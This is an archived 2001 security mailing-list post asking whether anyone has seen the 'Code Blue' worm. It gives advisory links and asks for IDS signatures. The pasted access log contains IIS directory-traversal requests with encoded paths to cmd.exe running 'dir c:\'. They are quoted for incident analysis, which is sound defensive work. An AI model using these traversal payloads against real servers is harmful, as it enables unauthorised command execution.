Any one seen any evidence of "Code Blue?"

From: Michael Katz (mikeat_private)
Date: Tue Sep 11 2001 - 19:18:39 PDT

Next message: Yaakov Yehudi: "Re: Any one seen any evidence of "Code Blue?""

Previous message: Boss: "Re: Terroristic attacks today"
Next in thread: Yaakov Yehudi: "Re: Any one seen any evidence of "Code Blue?""
Reply: Yaakov Yehudi: "Re: Any one seen any evidence of "Code Blue?""
Reply: Nick FitzGerald: "Re: Any one seen any evidence of "Code Blue?""
Reply: Pedro Miller Rabinovitch: "Re: Any one seen any evidence of "Code Blue?""
Reply: Patrick Belcher, Monitored Security: "RE: Any one seen any evidence of "Code Blue?""
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi all,

Why have I not seen anything on this list about the "Code Blue" worm?  I 
have received some alerts and news stories about a "Code Blue" worm:

http://www.infoworld.com/articles/hn/xml/01/09/07/010907hncodeblue.xml?0907alert
http://news.cnet.com/news/0-1003-200-7086783.html?tag=lh

A Chinese antivirus software company even has a cleanup tool for it at:

http://www.iduba.net/download/other/tool_010907_CodeBlue.htm

And other antivirus software companies now have virus definitions, 
explanations of the worm, and cleanup instructions:

http://www.sarc.com/avcenter/venc/data/w32.bluecode.worm.html
http://vil.mcafee.com/dispVirus.asp?virus_k=99202&
http://www.f-secure.com/v-descs/codeblue.shtml

Last, but not least, the FBI's Infragard program issued an advisory about 
it on September 10, 2001.

What is curious is the lack of discussion about it in a forum where I would 
expect to see it discussed.

Does anyone have a signature for IDS, what it looks like in a web server 
access log, or packet captures of its file transfer activity?

I submit the following web server access log as a possible candidate based 
on its source in Asia, that it is a new pattern we have seen recently, and 
it matches with the reported infection method:

a.b.c.d - - [10/Sep/2001:20:45:12 -0700] "GET 
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 
"-" "-"
a.b.c.d - - [10/Sep/2001:20:45:18 -0700] "GET 
/scripts/.%252e.%252e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 305 
"-" "-"
a.b.c.d - - [10/Sep/2001:20:45:20 -0700] "GET 
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:45:24 -0700] "GET 
/cgi-bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\ 
HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:45:38 -0700] "GET 
/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
HTTP/1.0" 404 207
a.b.c.d - - [10/Sep/2001:20:46:02 -0700] "GET 
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
HTTP/1.0" 404 207
a.b.c.d - - [10/Sep/2001:20:46:04 -0700] "GET 
/msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir+c:\ 
HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:46:07 -0700] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:46:09 -0700] "GET 
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:46:12 -0700] "GET 
/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:46:14 -0700] "GET 
/cgi-bin/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 
207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:46:18 -0700] "GET 
/cgi-bin/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 
207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:46:20 -0700] "GET 
/cgi-bin/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 
"-" "-"
a.b.c.d - - [10/Sep/2001:20:46:22 -0700] "GET 
/cgi-bin/.%252e.%252e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 
"-" "-"
a.b.c.d - - [10/Sep/2001:20:46:24 -0700] "GET 
/scripts/..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 
"-" "-"
a.b.c.d - - [10/Sep/2001:20:46:26 -0700] "GET 
/scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 
207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:46:29 -0700] "GET 
/scripts/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 
404 207 "-" "-"

Does anyone know whether this is indicative of a Code Blue infected machine 
- or some other automated tool?

Michael Katz
mikeat_private
Responsible Solutions, Ltd.


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Next message: Yaakov Yehudi: "Re: Any one seen any evidence of "Code Blue?""
Previous message: Boss: "Re: Terroristic attacks today"
Next in thread: Yaakov Yehudi: "Re: Any one seen any evidence of "Code Blue?""
Reply: Yaakov Yehudi: "Re: Any one seen any evidence of "Code Blue?""
Reply: Nick FitzGerald: "Re: Any one seen any evidence of "Code Blue?""
Reply: Pedro Miller Rabinovitch: "Re: Any one seen any evidence of "Code Blue?""
Reply: Patrick Belcher, Monitored Security: "RE: Any one seen any evidence of "Code Blue?""
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Sep 11 2001 - 21:17:31 PDT